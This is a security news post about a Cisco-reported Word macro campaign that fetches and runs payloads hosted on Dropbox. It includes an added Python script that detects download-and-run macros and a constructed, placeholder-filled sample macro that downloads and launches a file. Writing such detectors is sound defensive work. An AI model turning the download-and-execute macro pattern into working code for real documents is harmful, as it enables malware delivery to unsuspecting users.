We have already seen attacks in which bad actors abuse popular cloud storage services. A few days ago, Trend Micro analyzed a targeted attack against a Taiwanese government entity that used a variant of the PlugX RAT, which also abuses the Dropbox service.
“The threat actor used the cloud-based file-sharing service offered by Dropbox to host four separate pieces of the payload for the exploit. We reported these links to the Dropbox security team who confirmed that they disabled the file share links. We believe the londonpaerl.co.uk and selombiznet.in domains act as command and control servers.” reported Cisco in a blog post.
The attackers relied on a well-established technique, Visual Basic for Applications (VBA) macros, to conduct the attack.
“In this specific example the attackers targeted a feature within Microsoft Word — Visual Basic Scripting for Applications. While basic, the Office Macro attack vector is obviously still working quite effectively. When the victim opens the Word document, an On-Open macro fires, which results in downloading an executable and launching it on the victim’s machine. This threat actor has particularly lavish tastes. This threat actor seems to target high-profile, money-rich industries such as banking, oil, television, and jewelry.” states the post.
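For defenders, the behaviour Cisco describes (a macro that fires on open, fetches a file and launches it) can be triaged from macro source text. The sketch below is an added example, not code from Cisco or from the original post; it assumes the VBA source has already been extracted from the document as text, and the function names, indicator lists and both sample macros are constructed for illustration.

```python
import re

# Word entry points that run as soon as the document opens with macros enabled.
AUTO_OPEN = re.compile(r"^\s*(?:(?:public|private)\s+)?sub\s+(autoopen|document_open)\b", re.I)
DOWNLOAD = re.compile(r"urldownloadtofile|xmlhttp|winhttprequest", re.I)
EXECUTE = re.compile(r"\bshell\b|shellexecute", re.I)
CLOUD_HOST = re.compile(r"https?://(?:[\w-]+\.)*dropbox(?:usercontent)?\.com\b", re.I)
CHECKS = {"auto_open": AUTO_OPEN, "download": DOWNLOAD,
          "execute": EXECUTE, "cloud_host": CLOUD_HOST}

def strip_comment(line):
    """Drop a VBA comment (' or Rem) while leaving quoted strings intact."""
    if re.match(r"\s*rem\b", line, re.I):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def triage(vba_source):
    """Return the indicator classes present in non-comment macro code."""
    found = set()
    for raw in vba_source.splitlines():
        line = strip_comment(raw)
        found.update(name for name, rx in CHECKS.items() if rx.search(line))
    return found

def is_download_and_run(vba_source):
    """True when an on-open entry point co-occurs with fetch and launch calls."""
    return {"auto_open", "download", "execute"} <= triage(vba_source)

# Constructed fragment with placeholders; deliberately not runnable VBA.
SUSPICIOUS = '''Private Sub Document_Open()
    r = URLDownloadToFile(0, "https://www.dropbox.com/s/PLACEHOLDER/file", "<local path>", 0, 0)
    Shell "<local path>"
End Sub'''

# Constructed benign macro: the keywords appear only inside a comment.
BENIGN = '''Sub AutoOpen()
    ' old note: we used to call Shell and URLDownloadToFile here
    ActiveDocument.Fields.Update
End Sub'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, sorted(triage(src)), is_download_and_run(src))
```

A match is a reason to quarantine and inspect the document, not a verdict: obfuscated macros can hide these strings, which is why the co-occurrence check is only a first-pass filter.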
Cisco announced that next week it will provide more information on the group responsible for the attacks and on the exploits used in the offensive, including data on the malware used by the attackers and the obfuscation techniques implemented.